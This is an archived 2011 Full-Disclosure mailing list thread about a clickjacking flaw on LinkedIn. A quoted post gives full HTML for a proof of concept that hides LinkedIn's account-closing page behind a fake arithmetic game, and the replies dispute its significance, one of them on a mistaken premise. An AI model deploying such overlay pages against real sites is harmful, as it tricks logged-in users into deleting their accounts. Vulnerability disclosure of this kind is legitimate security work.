lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Mon, 10 Oct 2011 09:36:17 +1100
From: xD 0x41 <secn3t@...il.com>
To: Ferenc Kovacs <tyra3l@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: LinkedIn_User Account Delete using Click
	jacking

 seems that you aren't familiar what Clickjacking means then...

No,... and am happy not to know :-) , like XSS , i do not waste time with
ninoritiy bugs such as 'clickjacking' and these new such terms wich are
total BS.
anyhow... call it what you like, it is bs (just like the win32 dll crap and
simple-xss) CRAP!)
xd



On 10 October 2011 04:53, Ferenc Kovacs <tyra3l@...il.com> wrote:

> it seems that you aren't familiar what Clickjacking means then...
>
> On Sat, Oct 8, 2011 at 10:01 PM, xD 0x41 <secn3t@...il.com> wrote:
> > Thats just lame dude.... if you could remove OTHER poples accounts, then
> id
> > say 8clap clap*... but own account... whjat about just clicking "close
> > account" , and lets skip creating a html page, for this... :) cheers
> >
> >
> > On 8 October 2011 17:06, asish agarwalla <asishagarwalla@...il.com>
> wrote:
> >>
> >> Be logged into Linkedin, in firefox
> >> Create a HTML page using the below code
> >> Open the created HTML page in a new firefox tab
> >> Play the simple game
> >>
> >> <html>
> >> <head>
> >> <style>
> >> button.dummy1{position:absolute;top:75px;left:177px;z-index:-10}
> >> button.dummy3{position:absolute;top:214px;left:177px;z-index:-10}
> >> #Div3{
> >> opacity: 0;
> >> position: absolute;
> >> top: 25px;
> >> left: 160px;
> >> }
> >> #Div2{
> >> opacity: 1;
> >> position: absolute;
> >> top: 65px;
> >> left: 340px;
> >> }
> >> #Div1 {
> >> opacity: 1;
> >> position: absolute;
> >> top: 65px;
> >> left: 195px;
> >> }
> >> #victim2 {
> >> opacity: 1;
> >> position: absolute;
> >> top: 65px;
> >> left: 50px;
> >> }
> >> #victim {
> >> opacity: 0.4;
> >> position: absolute;
> >> top: -226px;
> >> left: -35px;
> >> width:800px;
> >> height: 800px;
> >> }
> >> </style>
> >> </head>
> >> <body>
> >> <div>
> >> <h1>Please Click Twice on the Right Options And Then Click Submit</h1>
> >> </div>
> >> <div id=Div3>
> >> <h1>55+27=?</h1>
> >> </div>
> >> <div id=victim2>
> >> <h1>55 </h1>
> >> </div>
> >> <div id=Div1>
> >> <h1>82</h1>
> >> </div>
> >> <div id=Div2>
> >> <h1>95</h1>
> >> </div>
> >> <button type="button" class="dummy3">Submit</button>
> >> <div id=victim>
> >> <iframe
> >> src="
> https://www.linkedin.com/secure/settings?closemyaccountstart=&goback=.nas_*1_*1_*1
> "
> >> border=0 scrolling=no width=650 height=1100></iframe>
> >> </div>
> >> </body>
> >> </html>
> >>
> >>
> >>
> >> _______________________________________________
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>
> --
> Ferenc Kovács
> @Tyr43l - http://tyrael.hu
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists